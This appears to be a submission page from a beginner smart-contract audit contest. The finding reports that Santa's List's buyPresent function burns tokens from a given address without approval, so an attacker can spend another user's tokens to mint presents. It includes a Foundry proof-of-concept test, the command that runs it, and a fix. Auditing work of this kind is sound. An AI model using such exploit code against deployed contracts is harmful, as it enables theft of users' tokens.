First Flight #5: Santa's List

First Flight #5

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

anyone can buy present using an address with santatokens as input

pelz

Summary

The vulnerability lies in the SantasList.buyPresent function, where an attacker can wrongfully burn tokens from the presentReceiver and mint additional presents. This manipulation leads to an unauthorized transfer of presents, impacting user balances and compromising the integrity of the contract's present purchase mechanism

Vulnerability Details

In the vulnerable buyPresent function, an attacker can exploit it by leveraging an extra nice user's address who has tokens to initiate the purchase of a present through the buyPresent function. This results in the burning of tokens from the unsuspecting user, followed by the unauthorized minting of additional presents. As a consequence, the attacker gains control over the present purchase mechanism, leading to a misalignment of user balances and compromising the intended functionality of the contract.

Impact

The identified vulnerability poses a significant impact on the smart contract's functionality and security. By exploiting the flaw in the buyPresent function, an attacker can wrongfully burn tokens from the intended recipient (presentReceiver) and initiate the unauthorized minting of additional presents.

POC

In the test file add this to the state variable :
address reciever = makeAddr("reciever");
Then add this function to test the exploit:

function testAttackBuyPresent() public {

vm.startPrank(santa);

santasList.checkList(user, SantasList.Status.EXTRA_NICE);

santasList.checkTwice(user, SantasList.Status.EXTRA_NICE);

vm.stopPrank();

vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);

// an extra nice user collects present

vm.startPrank(user);

santasList.collectPresent();

vm.stopPrank();

// buy present using extra nice user address

vm.startPrank(reciever);

santasList.buyPresent(user);

vm.stopPrank();

assertEq(santasList.balanceOf(user), 1);

assertEq(santaToken.balanceOf(user), 0);

assertEq(santasList.balanceOf(reciever), 1);

}

run this command to test only this function and observe the exploit
forge t --mt testAttackBuyPresent -vvvvv

Tools Used

Foundry & Manual Review

Recommendations

In the implementation of the i_santaToken burn function the presentReciever could be changed to msg.sender so the burn function burns tokens from whoever calls the function

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago

Submission Judgement Published

Validated

Assigned finding tags:

buyPresent should use msg.sender

Current implementation allows a malicious actor to burn someone else's tokens as the burn function doesn't actually check for approvals.

Rewards breakdown

nSLOC

116

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.